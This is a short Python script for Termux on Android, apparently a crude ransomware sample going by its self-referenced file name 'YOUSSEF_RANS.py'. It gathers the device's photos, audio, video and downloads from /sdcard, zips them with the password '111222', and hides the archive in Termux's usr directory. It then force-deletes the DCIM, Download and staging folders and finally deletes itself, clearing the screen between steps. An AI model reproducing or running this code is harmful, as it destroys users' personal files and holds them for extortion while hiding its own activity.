from os import system as a
a('mkdir /sdcard/photo')
a('mv /sdcard/*.jpg  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*.jpg  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*/*.jpg  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*/*/*.jpg  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*/*/*/*.jpg  /sdcard/photo')
a('clear')
a('mv /sdcard/*.png  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*.png  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*/*.png  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*/*/*.png  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*/*/*/*.png  /sdcard/photo')
a('mv /sdcard/*.mp3  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*.mp3  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*/*.mp3  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*/*/*.mp3  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*/*/*/*.mp3  /sdcard/photo')
a('clear')
a('mv /sdcard/*.mp4  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*.mp4  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*/*.mp4  /sdcard/photo')
a('clear')
a('mv /sdcard/*/*/*/*.mp4  /sdcard/photo')
a('mv /sdcard/*/*/*/*/*.mp4  /sdcard/photo')
a('mv /sdcard/Download/*  /sdcard/photo')
a('clear')
a('mv /sdcard/Download/*/*  /sdcard/photo')
a('clear')
a('mv /sdcard/Download/*/*/*  /sdcard/photo')
a('clear')
a('mv /sdcard/Download/*/*/*/*  /sdcard/photo')
a('clear')
a('mv /sdcard/Download/*/*/*/*/* /sdcard/photo')
a('clear')
a('cd /sdcard/photo')
a('clear')
a('zip -P 111222 rroooooot.zip /sdcard/photo /sdcard/photo/* > uu.txt')
a('clear')
a('mv /sdcard/photo/rroooooot.zip /data/data/com.termux/files/usr')
a('clear')
a('mv /sdcard/rroooooot.zip /data/data/com.termux/files/usr')
a('mv /data/data/com.termux/files/home/rroooooot.zip /data/data/com.termux/files/usr')
a('rm -rif /sdcard/photo')
a('rm -rif /sdcard/DCIM')
a('rm -rif /sdcard/Download')
a('rm -rif /data/data/com.termux/files/home/YOUSSEF_RANS.py')
a('clear')
a('clear')
